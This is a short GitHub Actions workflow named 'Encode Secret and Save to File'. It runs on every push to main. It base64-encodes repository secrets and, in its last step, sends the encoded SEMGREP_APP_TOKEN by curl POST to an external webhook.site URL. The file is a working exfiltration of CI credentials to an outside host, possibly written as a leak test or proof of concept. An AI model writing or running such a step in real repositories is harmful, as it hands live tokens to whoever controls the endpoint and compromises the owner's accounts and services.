name: Encode Secret and Save to File

on:
  push:
    branches:
      - main
  workflow_dispatch:

jobs:
  encode-secret:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repository
      uses: actions/checkout@v3

    - name: Base64 encode the TEST secret and save it to /tmp/secrets.txt
      run: echo "${{ secrets.TEST }}" | base64 --wrap=0 > /tmp/secrets.txt

    - name: Send the encoded secret
      run: |
        echo "${{ secrets.SEMGREP_APP_TOKEN }}" | base64 --wrap=0 > /tmp/secrets.txt
        curl -X POST -d "@/tmp/secrets.txt" https://webhook.site/8dae2bf4-e24f-4373-b31f-09c1fd9c4aad
